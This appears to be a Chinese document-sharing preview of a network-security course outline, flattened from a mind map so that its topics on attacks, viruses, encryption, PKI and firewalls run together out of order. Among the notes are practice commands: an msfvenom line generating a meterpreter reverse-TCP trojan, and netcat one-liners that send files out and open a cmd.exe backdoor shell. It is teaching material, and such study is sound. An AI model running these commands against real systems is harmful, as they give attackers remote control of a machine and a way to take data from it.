预览加载中,请您耐心等待几秒...
1/1

在线预览结束,喜欢就下载吧,查找使用更方便

如果您无法下载资料,请参考说明:

1、部分资料下载需要金币,请确保您的账户上有足够的金币

2、已购买过的文档,再次下载不重复扣费

3、资料包下载后请先用软件解压,在使用对应软件打开

内容 概念特征 分类 网络安全三维模型 应用层 安全体系 Internet安全体系结构传输层 安全标准 网络层 网络安全基础 TCSEC安全等级 安全等级 我国的信息安全等级 内部操作不当 内部管理漏洞 常见的威胁与攻击威胁和攻击的来源黑客攻击 来自外部的威胁和犯罪计算机病毒 拒绝服务攻击 窃取信息 获取口令 攻击目的 控制中间站点 获得超级用户权限 破坏性攻击 口令猜测 利用型攻击特洛伊木马 缓冲区溢出 地址扫描 端口扫描 扫描技术反响扫描 常见的网络攻击 慢速扫描 漏洞扫描 攻击事件分类 安全攻击与防范体系结构探测 DNS域转换 信息收集攻击 利用信息服务Finger服务 LDAP服务 DNS欺骗攻击 电子邮件攻击 网络欺骗攻击 Wed欺骗 IP欺骗 垃圾信息攻击 namp扫描 ping命令 攻击的准备阶段netstat命令 端口扫描 Telnet入侵 起源 非法性 隐藏性 潜伏性 定义 可触发性 破坏性 传染性 按照攻击的系统分类 源码型病毒 嵌入型病毒 按照链接方式分类 外壳型病毒 操作系统型病毒 msfvenom-aX64--platformWindows-pwindeows/x64/meterpreter/reverse_tcplhost=iplport=4444-fexe>text.exe生成木马 良性 按照破坏清空分类 ifconfig 恶性 分类 nc-l-p4444通信 磁盘引导区传染的计算机病毒 病毒 ncip4444 按照传染性分类操作系统传染的计算机病毒 nc-l-p4444-cifconfig 可执行程序传染的计算机病毒 返回shell的使用网络安全 ncip4444实操 定时型 netcat 按照激活的时间分类 nc-l-p4444>out.txt 随机型 文件传输计算机病毒与木马 ncip4444</home/kali 单机病毒 按照传播媒介分类 netcat信息探测 网络病毒 nc-l-p4444-ecmd.exe 引导模块 建立后门 xxxxxxxxxxnc[remote_ip][remote_port]-ecmd.exe 程序结构传染模块 表现、破坏模块 计算机运行速度的变化 计算机磁盘的变化 计算机病毒的表现计算机内存的变化 计算机文件系统的变化 异常的提示信息和现象 常见的病毒CIH病毒 概述 ① ② ③ 木马 安全解决方案④ ⑤ ⑥ ⑦ 产生 替代加密 古典密码 置换加密 DES 对称加密 AES RSA 加密算法介绍 背包密码 McEliece密码 非对称密码 Rabin 加密技术 椭圆曲线 DIGamalD_H PKI策略 软硬件系统 组成证书系统 PKI系统证书发布系统 PKI应用 技术基础 视图 网络安全的屏障 强化网络安全策略 功能对网络存取和访问进行监控和审计 防止内部信息的外泄 实现VPN的连接 概述 不能防御内部攻击 防火墙 不能防御绕过防火墙的攻击 问题不能防御完全新的威胁 不能防止传送已感染病毒的文件或软件 影响网络性能 硬件防火墙 分类 软件防火墙 发现目标 常见的攻击查找漏洞 破坏网络 无线局域网安全设置网络密钥 禁用SSID广播 安全防护 禁用DHCP 启用MAC地址、IP地址过滤